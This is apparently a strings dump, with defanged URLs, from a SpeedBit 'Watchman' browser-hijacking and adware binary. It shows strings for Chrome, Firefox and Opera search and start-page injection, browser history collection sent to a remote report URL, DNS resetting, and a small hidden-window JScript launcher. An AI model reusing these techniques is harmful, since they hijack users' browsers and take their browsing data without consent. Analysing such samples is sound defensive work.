yIJWKxbjMbcGK73GIXxwewdRVbBEee8e8Sm4euvIhO xNjQXmEd0Wn4f7e1 xHH1jpW1ObVWgKNGBUHlpIcw26SSGBdlM4qKzDKglTaj6aLg6s0UkXyGfqxPvW9rhhCWvujpEVgB5053CSbqy1ucw2l/G5Tyurk9KILPl 9mbszv86xmhBAFKqkSRf0RGq7mdOxDeKp ZWALgfbQpEAHE/wI3HCI7jG5tZbcfXIqPccGYKXdMsDJtPVFhkarxbZhWdlrZwpdUkjdHBgdnB8u0dXcR3RJKFd FIkhCY5DBOBGgNO5qhAc5Wd9AdrhbARpylrHznSEqJFU4SXEQiEEM2PGQHvmAzrfp9FdnnsXr J 5L4W6MxMFWIYDoxxRC1pfmMUtO3XQuEMeHkPHXj/7CPo8VXVzqBGhfo0g6lZCJW3572COYrDJGjiiGVDTt3lqVfwFE3wl7/nO5gy/oOnzjolGLMRsVv3UxIKY7wSRUI8VNwYmDhecqIeTowvWvm3Ogh52LIUf4H nQqb4QahUECz/jDEAYXJ0FNRzzqjsDehVf0dDn8qeajbqzopUccqQ7/s3so0CxYkDSO01CzoNe sS4OE8E/trLqK9aLDgfeXz2qd/4NI4raydy6Xg0vGBxhJeJVgG4tZRZCS74FWnpzUW4cTiJ7VwFPmVCGBGLdyqCXd5jh0cbL9p3BHDpIrPBXwE3G/SybQCKXWweqXBwX5airKzE3DgpqGwQ fNzV2IozfuNhvHkZqtVenBKVHSZBfTu92bi1WAbUO1gH4cDwRFjht6eq39e ewC/86Z7GWfW21naMOVH 6MSsfgXatGqmVHkc0RkG/HfqZxNJiOu//jOQ5pn1jezANGNjuCB25JKd5EgyYkQoaMXbzczP7NEPhVwCubR194OmKE5LOFyDE3iUKHozwPLenrObAB/MjkvKQjL6hrxfzT4PsY9IeglAFOW59163YDRdd/En8UMaO XQeiNzXcXjLVOZUgAofh9a5 ncBbOAi5kq4AOdTrV5sryxFxdsOLLl0HGcxGTjRAIfrBnlYPLdx1GoTBeF3/X2QS0qwjnP4bK77CDJuZhDXyeM6lEDC c2hDG5BcTBk EMmDj2Bp7yGDKpdcb3wWCa2Bb a5tYl8TJM6oArCnqPEiwr5CcwPYnPThgsNrA2r/ub6ETp6j8uiNOZZndiQkGI9Vp aTUhM lWAojBLlyZVUQr72wlMCrs3blNi794bkhcPvqrwWU=

2, 3, 12, 1634

Envelop.xml

UrlSet

Configuration.xml

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

ReportUrl

UpdateUrl

ReportDlls

User.xml

Argument.Snapshot:

Argument.GeneralConfig:

Argument.Flags:

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

unable to close due to unfinished backup operation

SQL logic error or missing database

large file support is disabled

unknown database: %s

no such vfs: %s

misuse at line %d of [%.10s]

database corruption at line %d of [%.10s]

cannot open file at line %d of [%.10s]

SQLITE_

d-d-d d:d:d

d-d-d

d:d:d

failed memory resize %u to %u bytes

failed to allocate %u bytes of memory

API call with %s database connection pointer

922337203685477580

RowKey

%s-shm

OsError 0x%x (%u)

%s\etilqs_

Recovered %d frames from WAL file %s

2nd reference to page %d

invalid page number %d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

Page %d:

freelist leaf count too big on page %d

btreeInitPage() returns error code %d

unable to get the page. error code=%d

On tree page %d cell %d:

On page %d at right child:

Multiple uses for byte %d of page %d

Corruption detected in cell %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Outstanding page count goes from %d to %d during this analysis

Pointer map page %d is referenced

keyinfo(%d

%s(%d)

foreign key constraint failed

%s-mjX

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

constraint failed at %d in [%s]

abort at %d in [%s]: %s

no such savepoint: %s

cannot open savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

sqlite_master

cannot change %s wal mode from within a transaction

statement aborts at %d: [%s] %s

database table is locked: %s

cannot open view: %s

cannot open virtual table: %s

foreign key

no such column: "%s"

cannot open %s column for writing

indexed

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s

%s: %s.%s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

variable number must be between ?1 and ?%d

Expression tree is too large (maximum depth %d)

too many columns in %s

too many SQL variables

misuse of aggregate: %s()

%s%.*s"%w"

%.*s"%w"%s

sqlite_rename_table

sqlite_rename_parent

sqlite_rename_trigger

%s OR name=%Q

there is already another table or index with this name: %s

table %s may not be altered

sqlite_

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

view %s may not be altered

sqlite_sequence

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_stat1

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

invalid name: "%s"

SELECT idx, stat FROM %Q.sqlite_stat1

too many attached databases - max %d

database %s is already in use

unable to open database: %s

cannot detach database %s

no such database: %s

database %s is locked

sqlite_attach

sqlite_detach

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

access to %s.%s.%s is prohibited

object name reserved for internal use: %s

too many columns on %s

there is already an index named %s

default value of column [%s] is not constant

duplicate column name: %s

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

no such collation sequence: %s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE %s %.*s

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

table %s may not be dropped

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %s.sqlite_sequence WHERE name=%Q

foreign key on %s should reference only one column of table %T

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

indexed columns are not unique

table %s may not be indexed

virtual tables may not be indexed

views may not be indexed

index %s already exists

there is already a table named %s

table %s has no column named %s

sqlite_autoindex_%s_%d

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

CREATE%s INDEX %.*s

no such index: %S

DELETE FROM %Q.%s WHERE name=%Q

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

cannot modify %s because it is a view

table %s may not be modified

sqlite_source_id

sqlite_version

sqlite_compileoption_get

sqlite_compileoption_used

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has no column named %s

%d values for %d columns

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

no entry point [%s] in shared library [%s]

unable to open shared library [%s]

automatic extension loading failed: %s

error during initialization: %s

foreign_keys

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

unsupported file format

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

unknown or unsupported join type: %T %T%s%T

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

cannot join using column %s - column not present in both tables

%s.%s

ORDER BY clause should come after %s not before

%s:%d

SELECTs to the left and right of %s do not have the same number of result columns

LIMIT clause should come after %s not before

sqlite_subquery_%p_

no such index: %s

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

no such column: %s

-- TRIGGER %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor did not declare schema: %s

vtable constructor failed: %s

no such module: %s

at most %d tables in a join

table %s: xBestIndex returned an invalid plan

TABLE %s

cannot use index: %s

%s WITH AUTOMATIC INDEX

%s AS %s

%s VIA MULTI-INDEX UNION

%s WITH INDEX %s

%s VIRTUAL TABLE INDEX %d:%s

%s USING PRIMARY KEY

%s ORDER BY

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

SHELL32.dll

SHLWAPI.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

DisconnectNamedPipe

GetNamedPipeInfo

GetCPInfo

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

zcÃ

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVCHttpAsync@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVCHttp@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

if (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i

args.push(WScript.Arguments(i));

var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";

path = " \"" args.join("\" \"") "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

1(1-1F1S1X1n1}1

00151@1\1

040;0_0~0

?%?)?.?3?>?

8Â8

=2=9=`=->:>

0"161\1}1

1!1)141=1

8"9(9,90949

>.?4?8?@?

2 2$2(2,272

:%:,:2:8:

4 4$4(4,4044484

$5(5,5054585

; ;$;(;,;0;4;8;

> >$>(>,>0>4>8>

? ?,?0?4?8?

,0004080

6 6$6(6,6

7 7(707

combase.dll

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking

777705555443332

5555443332

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

crossbrowse.exe

vosteran.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

smci32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

smei32.dll

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::Create

URL to use:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

Need to send report!!!

Original report URL:

ServerReporter::SendInitialReport

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf

WKERNEL32.DLL

VERSION.DLL

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

NTDLL.DLL

Windows NT 6.1

%s?e=%s

zvl=%s&

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

&tss=%d&action=%s&actionparam=%s

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

ntdll.dll

Could not open memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

[BrowserHistory::GetPropertyReport]

Found URL:

X-hX-hX-XX-XXXXXX

IExecAction::put_Path

IAction::QueryInterface

IExecAction::put_Arguments

IExecAction::put_WorkingDirectory

http\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Could not create pipe. %%s

Could not allocate IPC memory. Requires size: %u

Event error. %%s

Could not create pipe event. %%s

Pipe connecting error. %%s

Error code: %u ('%s')

Not enough memory. Size: %s (%s)

Could not create IPC event. %%s

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

XXX

HTTP/1.1

Content-Disposition: form-data; name="%s"

Software\Microsoft\Windows\CurrentVersion\Internet Settings

HTTP/1.0

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

[SynchronousPipe::Read]

[SynchronousPipe::Write]

CChromeExtension::GetFileListInExtenstion

__MSG_

messages.json

manifest.json

CHROME.EXE

[Chrome::BrowserInfo::Query]

WebData

SHELL32.DLL

e\Application\chrome.exe

Google\Chrome

\resources.pak

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\

\Web Data

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderId]

chrome-extension://

13050095043000000

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build]

[Injection::Snapshot::Builder::BuildSettings]

Injection::Snapshot::Parser::Parse

new

Injection::Snapshot::Parser::Parse

new

[Injection::Snapshot::Parser::Parse]

ReadStringNode

[Injection::Snapshot::Parser::Parse]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsChromeInstalled]

Firefox::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::User:

Argument.Config::General:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Generate

MachineKey::Create

[WatchmanKey::LoadEncodedData]

[WatchmanKey::CleanupKey]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

WatchmanKey::System::Open

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::LoadEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::System::Ensure

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Ensure]

WatchmanKey::OpenKey

[WatchmanKey::Users::Open]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::SaveConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

smod.xml

SearchModulePlus.crx

DATAMNGR.DLL

IEBHO.DLL

VC32.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode

eReadStringNode

ReadStringNode

[Config::General::Parser::ParseChromeSettings]

Config::General::Parser::ParseChromeValueSets

MissedElement

ReadStringNode

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode

[Config::General::Parser::ParseFirefoxSettings]

ReadStringNode

Config::General::Parser::ParseFirefoxValueSets

MissedElement

ReadOptionalStringNode

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode

lReadOptionalStringNode

MissedElement

[Config::General::Parser::ParseUrlSet]

ReadStringNode

yReadStringNode

ReadStringNode

[Config::General::Parser::ParseOperaSettings]

ReadStringNode

MissedElement

ReadStringNode

[Config::General::Builder::Build]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

2.1.0.7

2.0.0.0

ReadOptionalStringNode

ReadStringNode

ReadBooleanNode

Could not find URL Set in configuration. Probably older configuration.

ReadBooleanNode

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

Mozilla\Firefox\

profiles.ini

prefs.js

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::ParseProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

No profiles found! Maybe - first start of Firefox?

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Internet Explorer\AboutURLs

TopResultURLFallback

SuggestionURL

FaviconURL

IEXPLORE.EXE

Failed to call enum URL's. Error:

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

